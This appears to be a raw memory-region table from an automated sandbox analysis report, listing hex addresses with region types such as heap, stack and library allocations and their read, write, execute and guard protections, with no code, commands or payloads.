4CBA000
heap
page read and write
38B1000
heap
page read and write
250000
trusted library allocation
page read and write
100000
heap
page read and write
2D0000
heap
page read and write
4BAB000
heap
page read and write
4BF1000
heap
page read and write
299F000
heap
page read and write
2F0F000
stack
page read and write
450000
trusted library allocation
page execute and read and write
270000
heap
page read and write
648F000
stack
page read and write
2748000
trusted library allocation
page read and write
2020000
heap
page read and write
369D000
stack
page read and write
60F000
heap
page read and write
2A1B000
heap
page read and write
3B70000
trusted library allocation
page read and write
43B0000
trusted library allocation
page read and write
730000
heap
page read and write
4E92000
heap
page read and write
4CF5000
heap
page read and write
4B7B000
heap
page read and write
E59000
heap
page read and write
2747000
trusted library allocation
page read and write
E0E000
heap
page read and write
2A10000
heap
page read and write
96B000
heap
page read and write
532E000
stack
page read and write
52B2000
heap
page read and write
3D9000
trusted library allocation
page read and write
273D000
trusted library allocation
page read and write
55B000
heap
page read and write
5042000
heap
page read and write
2722000
trusted library allocation
page read and write
420000
heap
page read and write
2B9000
heap
page read and write
8DF000
heap
page read and write
170000
heap
page read and write
4310000
trusted library allocation
page read and write
39F1000
heap
page read and write
37C000
stack
page read and write
66B000
heap
page read and write
39B8000
heap
page read and write
B7E000
stack
page read and write
2A34000
heap
page read and write
29AB000
heap
page read and write
2022000
heap
page read and write
A7E000
stack
page read and write
497E000
stack
page read and write
2D7000
heap
page read and write
4D53000
heap
page read and write
E1F000
heap
page read and write
50F0000
heap
page read and write
393E000
heap
page read and write
990000
heap
page read and write
39C1000
heap
page read and write
4D7000
heap
page read and write
24E000
stack
page read and write
5A0000
heap
page read and write
2514000
trusted library allocation
page read and write
4D5F000
heap
page read and write
314E000
stack
page read and write
3D0000
trusted library allocation
page read and write
2741000
trusted library allocation
page read and write
301F000
stack
page read and write
328F000
stack
page read and write
36B3000
heap
page read and write
2006000
heap
page read and write
2528000
trusted library allocation
page read and write
350D000
trusted library allocation
page read and write
2920000
heap
page read and write
2A0000
heap
page read and write
2A1B000
heap
page read and write
4D18000
heap
page read and write
274B000
trusted library allocation
page read and write
2F60000
trusted library allocation
page read and write
39C5000
heap
page read and write
4DBE000
stack
page read and write | page guard
4E7D000
heap
page read and write
570000
heap
page read and write
266000
stack
page read and write
4C30000
heap
page read and write
2746000
trusted library allocation
page read and write
2D0000
heap
page read and write
921000
heap
page read and write
39B2000
heap
page read and write
3A8F000
stack
page read and write
4D5E000
stack
page read and write | page guard
1D9D000
heap
page read and write
440000
trusted library allocation
page read and write
41E000
stack
page read and write
39B3000
heap
page read and write
384000
stack
page read and write
4B9F000
heap
page read and write
8F0000
trusted library allocation
page read and write
3A07000
heap
page read and write
39C5000
heap
page read and write
29A5000
heap
page read and write
43B0000
trusted library allocation
page read and write
2592000
trusted library allocation
page read and write
737000
heap
page read and write
5FC0000
heap
page read and write
2F60000
heap
page read and write
39D3000
heap
page read and write
E59000
heap
page read and write
39C6000
heap
page read and write
1FBE000
heap
page read and write
3C8D000
stack
page read and write
398E000
heap
page read and write
19C000
stack
page read and write
23C000
stack
page read and write
21D0000
heap
page read and write
23AF000
stack
page read and write
4C97000
heap
page read and write
39CF000
heap
page read and write
273B000
trusted library allocation
page read and write
2021000
heap
page read and write
43B0000
trusted library allocation
page read and write
921000
heap
page read and write
2711000
trusted library allocation
page read and write
4D9000
heap
page read and write
6120000
heap
page read and write
310000
heap
page read and write
36F1000
heap
page read and write
83A1000
trusted library allocation
page read and write
A0C000
heap
page read and write
273F000
trusted library allocation
page read and write
2021000
heap
page read and write
2E50000
heap
page read and write
E70000
trusted library allocation
page read and write
3A07000
heap
page read and write
5AD000
heap
page read and write
496E000
stack
page read and write
286F000
stack
page read and write
3936000
heap
page read and write
2B0000
heap
page read and write
455E000
stack
page read and write | page guard
214E000
stack
page read and write
48F000
heap
page read and write
41B000
system
page execute and read and write
4B3E000
stack
page read and write
428000
heap
page read and write
39D7000
heap
page read and write
32E0000
trusted library allocation
page read and write
AB000
stack
page read and write
4F2D000
stack
page read and write
49FE000
stack
page read and write
260000
trusted library allocation
page execute and read and write
6F0000
trusted library allocation
page read and write
2210000
heap
page read and write
8DA1000
trusted library allocation
page read and write
5DCE000
stack
page read and write
46F000
heap
page read and write
4B8E000
stack
page read and write
36B2000
heap
page read and write
39C6000
heap
page read and write
36A0000
heap
page read and write
2ABC000
heap
page read and write
618E000
stack
page read and write
3B60000
trusted library allocation
page read and write
471000
heap
page read and write
2639000
trusted library allocation
page read and write
46F000
heap
page read and write
F6A000
stack
page read and write
A3D000
stack
page read and write
E59000
heap
page read and write
3242000
heap
page read and write
490F000
stack
page read and write
49B000
heap
page read and write
390000
trusted library allocation
page read and write
36DC000
heap
page read and write
271C000
trusted library allocation
page read and write
59D000
heap
page read and write
CAF000
stack
page read and write
68D000
stack
page read and write
DFE000
heap
page read and write
27FF000
stack
page read and write
296F000
stack
page read and write
2FE000
stack
page read and write
39F3000
heap
page read and write
9D0000
trusted library allocation
page read and write
49C000
heap
page read and write
4A6F000
stack
page read and write
460000
heap
page read and write
3A07000
heap
page read and write
2539000
trusted library allocation
page read and write
2737000
trusted library allocation
page read and write
36B000
stack
page read and write
39B1000
heap
page read and write
51D000
heap
page read and write
4DB2000
heap
page read and write
F8E000
stack
page read and write | page guard
39CD000
heap
page read and write
456000
heap
page read and write
22BF000
stack
page read and write
4C6D000
stack
page read and write
4A00000
trusted library allocation
page read and write
530000
heap
page read and write
5D2000
heap
page read and write
63A1000
trusted library allocation
page read and write
39CD000
heap
page read and write
F10000
trusted library allocation
page read and write
1FD0000
heap
page execute and read and write
2030000
heap
page read and write
4BDA000
heap
page read and write
4BDE000
stack
page read and write
3A02000
heap
page read and write
2744000
trusted library allocation
page read and write
3B90000
trusted library allocation
page read and write
E9B000
stack
page read and write
475000
heap
page read and write
337F000
stack
page read and write
10000
heap
page read and write
273B000
trusted library allocation
page read and write
10000
heap
page read and write
240000
trusted library allocation
page read and write
E6C000
stack
page read and write
51AD000
stack
page read and write
290000
trusted library allocation
page read and write
36CF000
heap
page read and write
5D2000
heap
page read and write
4B93000
heap
page read and write
356000
heap
page execute and read and write
2758000
trusted library allocation
page read and write
2F6000
heap
page read and write
57D000
heap
page read and write
667000
heap
page read and write
4F60000
heap
page read and write
4CD2000
heap
page read and write
21A0000
heap
page read and write
39FA000
heap
page read and write
273C000
trusted library allocation
page read and write
AA0000
heap
page read and write
10000
heap
page read and write
271C000
trusted library allocation
page read and write
2030000
direct allocation
page read and write
E1F000
heap
page read and write
8B7000
heap
page read and write
29A3000
heap
page read and write
3936000
heap
page read and write
DF0000
trusted library allocation
page read and write
400000
system
page execute and read and write
43B0000
trusted library allocation
page read and write
980000
trusted library allocation
page read and write
3A02000
heap
page read and write
4310000
trusted library allocation
page read and write
A1E000
stack
page read and write
48F0000
trusted library allocation
page read and write
920000
trusted library allocation
page read and write
465000
heap
page read and write
4A13000
heap
page read and write
262E000
stack
page read and write
2928000
heap
page read and write
639E000
stack
page read and write
3A07000
heap
page read and write
2030000
heap
page read and write
36F1000
heap
page read and write
1FB9000
heap
page read and write
400F000
stack
page read and write
4E7000
heap
page read and write
49B000
heap
page read and write
8F0000
trusted library allocation
page read and write
4F9E000
stack
page read and write
39D3000
heap
page read and write
39FE000
heap
page read and write
63F000
heap
page read and write
3936000
heap
page read and write
304F000
stack
page read and write
45D000
system
page execute and read and write
34B0000
trusted library allocation
page read and write
1DE000
stack
page read and write
350F000
heap
page read and write
2561000
trusted library allocation
page read and write
39B3000
heap
page read and write
80E000
stack
page read and write
911000
heap
page read and write
3D80000
trusted library allocation
page read and write
274C000
trusted library allocation
page read and write
39F7000
heap
page read and write
36DD000
heap
page read and write
E30000
trusted library allocation
page read and write
2744000
trusted library allocation
page read and write
2A0D000
heap
page read and write
3A02000
heap
page read and write
4BC2000
heap
page read and write
1F30000
heap
page read and write
366000
stack
page read and write
5EB2000
heap
page read and write
2715000
trusted library allocation
page read and write
EBE000
stack
page read and write
625F000
stack
page read and write
295000
trusted library allocation
page execute and read and write
1D3000
trusted library allocation
page execute and read and write
7C1000
heap
page read and write
309E000
stack
page read and write
2264000
heap
page read and write
693E000
trusted library allocation
page read and write
39F7000
heap
page read and write
454E000
stack
page read and write | page guard
42C000
heap
page read and write
363D000
stack
page read and write
4034000
heap
page read and write
200F000
heap
page read and write
59F000
heap
page read and write
37F000
stack
page read and write
E90000
trusted library allocation
page read and write
4C8B000
heap
page read and write
4ACE000
stack
page read and write
1F8C000
heap
page read and write
2730000
trusted library allocation
page read and write
966000
heap
page read and write
1EA000
trusted library allocation
page read and write
10000
heap
page read and write
49E000
heap
page read and write
2501000
trusted library allocation
page read and write
760000
trusted library allocation
page read and write
1EBE000
stack
page read and write
455F000
stack
page read and write
5E22000
heap
page read and write
25C000
stack
page read and write
775000
heap
page read and write
474000
heap
page read and write
3C0000
trusted library allocation
page read and write
4BE000
heap
page read and write
5E6F000
stack
page read and write
646000
heap
page read and write
2F6C000
heap
page read and write
796000
heap
page read and write
1BA000
trusted library allocation
page read and write
3ECF000
stack
page read and write
3529000
trusted library allocation
page read and write
A7000
stack
page read and write
F10000
trusted library allocation
page execute and read and write
29A1000
heap
page read and write
38FB000
heap
page read and write
AC000
stack
page read and write
E11000
heap
page read and write
2DE0000
trusted library allocation
page read and write
36C7000
heap
page read and write
39CA000
heap
page read and write
201E000
heap
page read and write
2721000
trusted library allocation
page read and write
63A000
heap
page read and write
470000
trusted library allocation
page read and write
440000
trusted library allocation
page read and write
39B3000
heap
page read and write
E60000
trusted library allocation
page read and write
3DC0000
heap
page read and write
1D4000
trusted library allocation
page read and write
2D30000
trusted library allocation
page read and write
39FC000
heap
page read and write
444000
heap
page read and write
390F000
heap
page read and write
226D000
stack
page read and write
3B0000
heap
page read and write
4E90000
heap
page read and write
4C5C000
heap
page read and write
3A07000
heap
page read and write
600D000
stack
page read and write
2140000
heap
page read and write
437000
heap
page read and write
5F2E000
stack
page read and write
3BA000
stack
page read and write
4D01000
heap
page read and write
29BC000
heap
page read and write
A80000
trusted library allocation
page read and write
2725000
trusted library allocation
page read and write
446000
heap
page read and write
205000
trusted library allocation
page execute and read and write
29A5000
heap
page read and write
65F000
stack
page read and write
28C0000
trusted library allocation
page execute
4CDE000
stack
page read and write
9E0000
trusted library allocation
page read and write
4F78000
heap
page read and write
27FD000
trusted library allocation
page read and write
757000
heap
page read and write
E1A000
heap
page read and write
2A10000
heap
page read and write
2919000
trusted library allocation
page read and write
39CF000
heap
page read and write
20000
heap
page read and write
3950000
heap
page read and write
BDA1000
trusted library allocation
page read and write
2009000
heap
page read and write
F8F000
stack
page read and write
1DD000
trusted library allocation
page execute and read and write
B3A1000
trusted library allocation
page read and write
39ED000
heap
page read and write
3F3E000
stack
page read and write
5F0000
direct allocation
page read and write
4AFD000
stack
page read and write
273B000
trusted library allocation
page read and write
981000
heap
page read and write
8EC000
stack
page read and write
595000
heap
page read and write
8A000
stack
page read and write
4E20000
heap
page read and write
1A0000
trusted library allocation
page read and write
2F5E000
stack
page read and write
20000
heap
page read and write
3983000
heap
page read and write
2A38000
heap
page read and write
4E8D000
heap
page read and write
664000
heap
page read and write
28BC000
trusted library allocation
page read and write
D7F000
stack
page read and write
361F000
stack
page read and write
2A10000
heap
page read and write
5D7D000
stack
page read and write
4C2C000
heap
page read and write
E2D000
heap
page read and write
2D80000
trusted library allocation
page read and write
430000
heap
page read and write
4F70000
heap
page read and write
7EF77000
trusted library allocation
page execute read
63F000
heap
page read and write
2260000
heap
page read and write
10000
heap
page read and write
365E000
stack
page read and write
39CA000
heap
page read and write
B0E000
stack
page read and write
5D2000
heap
page read and write
2CEF000
stack
page read and write
A03000
heap
page read and write
2022000
heap
page read and write
39F3000
heap
page read and write
A20000
trusted library allocation
page read and write
790000
heap
page read and write
2713000
trusted library allocation
page read and write
2900000
trusted library allocation
page read and write
479000
heap
page read and write
2B0000
trusted library allocation
page read and write
4D7000
heap
page read and write
25CF000
stack
page read and write
A0000
heap
page read and write
2A10000
heap
page read and write
426C000
stack
page read and write
3C2E000
stack
page read and write
951000
heap
page read and write
29A3000
heap
page read and write
DDF000
stack
page read and write
E3B000
heap
page read and write
373C000
heap
page read and write
FD0000
heap
page execute and read and write
3DF000
trusted library allocation
page read and write
2A10000
heap
page read and write
4C09000
heap
page read and write
E25000
heap
page read and write
3A14000
heap
page read and write
3DCF000
stack
page read and write
43B0000
trusted library allocation
page read and write
3934000
heap
page read and write
860000
trusted library allocation
page read and write
39C6000
heap
page read and write
39ED000
heap
page read and write
48FD000
stack
page read and write
4C21000
heap
page read and write
29AB000
heap
page read and write
4FDA000
heap
page read and write
2501000
trusted library allocation
page read and write
2A1E000
heap
page read and write
1D6C000
heap
page read and write
97C000
stack
page read and write
29C0000
heap
page read and write
39CC000
heap
page read and write
590000
direct allocation
page read and write
71D000
stack
page read and write
2B90000
trusted library allocation
page read and write
36B4000
heap
page read and write
39D3000
heap
page read and write
8A0000
trusted library allocation
page read and write
2A10000
heap
page read and write
4E6D000
heap
page read and write
869000
trusted library allocation
page read and write
202C000
heap
page read and write
39D3000
heap
page read and write
21BE000
unkown
page read and write
648000
heap
page read and write
2728000
trusted library allocation
page read and write
E00000
trusted library allocation
page read and write
3A02000
heap
page read and write
34C7000
trusted library allocation
page read and write
263000
trusted library allocation
page execute and read and write
478000
remote allocation
page execute and read and write
596000
direct allocation
page read and write
43B0000
trusted library allocation
page read and write
4C4D000
heap
page read and write
890000
trusted library allocation
page read and write
20000
heap
page read and write
3A14000
heap
page read and write
15C000
stack
page read and write
2030000
heap
page read and write
5F0E000
stack
page read and write
39D7000
heap
page read and write
952000
heap
page read and write
4A10000
heap
page read and write
998000
heap
page read and write
39C1000
heap
page read and write
648000
heap
page read and write
B2E000
stack
page read and write
3904000
heap
page read and write
202000
trusted library allocation
page read and write
39F3000
heap
page read and write
262F000
stack
page read and write
29A3000
heap
page read and write
62FE000
stack
page read and write
7C3000
heap
page read and write
3D7000
trusted library allocation
page read and write
36F1000
heap
page read and write
39CF000
heap
page read and write
43B0000
trusted library allocation
page read and write
3A07000
heap
page read and write
4C10000
heap
page read and write
410F000
stack
page read and write
B10000
trusted library allocation
page read and write
39FA000
heap
page read and write
A00000
heap
page read and write
1FBC000
heap
page read and write
464000
heap
page read and write
664000
heap
page read and write
DE0000
heap
page read and write
4DDE000
stack
page read and write | page guard
190000
trusted library allocation
page read and write
3A02000
heap
page read and write
2970000
heap
page read and write
5F6E000
stack
page read and write
398000
heap
page read and write
316D000
trusted library allocation
page read and write
4D48000
heap
page read and write
1AD000
trusted library allocation
page execute and read and write
3A14000
heap
page read and write
275F000
stack
page read and write
5193000
heap
page read and write
4D0D000
heap
page read and write
3980000
heap
page read and write
250000
trusted library allocation
page execute and read and write
ADA1000
trusted library allocation
page read and write
36E2000
heap
page read and write
1FBF000
heap
page read and write
2070000
heap
page read and write
36F1000
heap
page read and write
2F6C000
heap
page read and write
2544000
trusted library allocation
page read and write
4D77000
heap
page read and write
277000
heap
page read and write
2717000
trusted library allocation
page read and write
3D8D000
stack
page read and write
2BF7000
trusted library allocation
page read and write
5E90000
heap
page read and write
34F0000
trusted library allocation
page read and write
276D000
trusted library allocation
page read and write
10001000
direct allocation
page execute and read and write
48D000
heap
page read and write
1EB000
heap
page read and write
39FC000
heap
page read and write
4D1000
heap
page read and write
701000
heap
page read and write
63CE000
stack
page read and write
3A14000
heap
page read and write
3501000
trusted library allocation
page read and write
110000
trusted library allocation
page read and write
4A6000
heap
page read and write
43B0000
trusted library allocation
page read and write
564000
heap
page read and write
575000
heap
page read and write
2BC0000
trusted library allocation
page read and write
39ED000
heap
page read and write
43D0000
heap
page read and write
2941000
heap
page read and write
427000
heap
page read and write
46B000
heap
page read and write
2A1E000
heap
page read and write
2721000
trusted library allocation
page read and write
2F60000
trusted library allocation
page read and write
275000
stack
page read and write
4B0E000
stack
page read and write
951000
heap
page read and write
398C000
heap
page read and write
502000
heap
page read and write
39B8000
heap
page read and write
207000
trusted library allocation
page execute and read and write
10000
heap
page read and write
F00000
trusted library allocation
page read and write
539000
heap
page read and write
4FA3000
heap
page read and write
5153000
heap
page read and write
2021000
heap
page read and write
880000
trusted library allocation
page read and write
314000
heap
page read and write
6260000
heap
page read and write
32BF000
stack
page read and write
3A07000
heap
page read and write
4BCE000
heap
page read and write
E4A000
heap
page read and write
6AB0000
heap
page read and write
39C6000
heap
page read and write
There are 1344 hidden memdumps, click here to show them.